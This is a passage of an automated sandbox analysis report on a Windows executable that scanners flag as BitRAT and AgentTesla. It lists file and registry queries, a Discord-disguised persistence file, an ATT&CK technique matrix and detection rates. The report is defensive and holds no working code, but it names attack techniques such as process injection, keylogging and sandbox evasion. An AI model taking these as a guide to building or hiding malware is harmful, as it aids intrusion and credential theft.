Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_0041369B __EH_prolog,GetSystemTimes,GetCurrentProcess,GetProcessTimes,GetTickCount64,

19_2_0041369B

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_00471490 __EH_prolog,GetUserNameW,

19_2_00471490

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected BitRAT

Show sources

Source: Yara match	File source: Process Memory Space: 0kEuVjiCbh.exe PID: 1832, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0kEuVjiCbh.exe PID: 5952, type: MEMORY

Remote Access Functionality:

Yara detected BitRAT

Show sources

Source: Yara match	File source: Process Memory Space: 0kEuVjiCbh.exe PID: 1832, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0kEuVjiCbh.exe PID: 5952, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting111	Registry Run Keys / Startup Folder11	Access Token Manipulation1	Disable or Modify Tools1	Input Capture1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection212	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter2	Logon Script (Windows)	Registry Run Keys / Startup Folder11	Scripting111	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	System Information Discovery24	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Security Software Discovery421	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion131	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Virtualization/Sandbox Evasion131	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection212	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0kEuVjiCbh.exe	22%	Virustotal		Browse
0kEuVjiCbh.exe	23%	Metadefender		Browse
0kEuVjiCbh.exe	48%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
0kEuVjiCbh.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	23%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	48%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe	23%	Metadefender		Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe	48%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
19.2.0kEuVjiCbh.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1140205		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.fontbureau.comcemfE	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cntuE	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cnM	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Hebr	0%	Avira URL Cloud	safe
http://www.fontbureau.compE	0%	Avira URL Cloud	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.carterandcone.comal	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/fE	0%	Avira URL Cloud	safe
http://www.carterandcone.com(	0%	Avira URL Cloud	safe
http://livesplit.org/	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.carterandcone.comTCA	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/TE	0%	Avira URL Cloud	safe
http://www.carterandcone.comC	0%	URL Reputation	safe
http://www.carterandcone.comC	0%	URL Reputation	safe
http://www.carterandcone.comC	0%	URL Reputation	safe
http://www.founder.com.cn/cny	0%	URL Reputation	safe
http://www.founder.com.cn/cny	0%	URL Reputation	safe
http://www.founder.com.cn/cny	0%	URL Reputation	safe
http://www.carterandcone.comht	0%	URL Reputation	safe
http://www.carterandcone.comht	0%	URL Reputation	safe
http://www.carterandcone.comht	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/TE	0%	Avira URL Cloud	safe
http://www.carterandcone.comR	0%	Avira URL Cloud	safe
http://www.carterandcone.comTC1	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.founder.com.cn/cnl-g~	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.carterandcone.como.	0%	URL Reputation	safe
http://www.carterandcone.como.	0%	URL Reputation	safe
http://www.carterandcone.como.	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.carterandcone.comN	0%	Avira URL Cloud	safe
http://www.carterandcone.comL	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn_tr	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp//h(	0%	Avira URL Cloud	safe
http://www.carterandcone.comf	0%	URL Reputation	safe
http://www.carterandcone.comf	0%	URL Reputation	safe
http://www.carterandcone.comf	0%	URL Reputation	safe
http://www.carterandcone.comd	0%	URL Reputation	safe
http://www.carterandcone.comd	0%	URL Reputation	safe
http://www.carterandcone.comd	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.carterandcone.comte	0%	Avira URL Cloud	safe
http://www.carterandcone.comTC	0%	URL Reputation	safe
http://www.carterandcone.comTC	0%	URL Reputation	safe
http://www.carterandcone.comTC	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/xE	0%	Avira URL Cloud	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
http://www.carterandcone.comp	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/pE	0%	Avira URL Cloud	safe
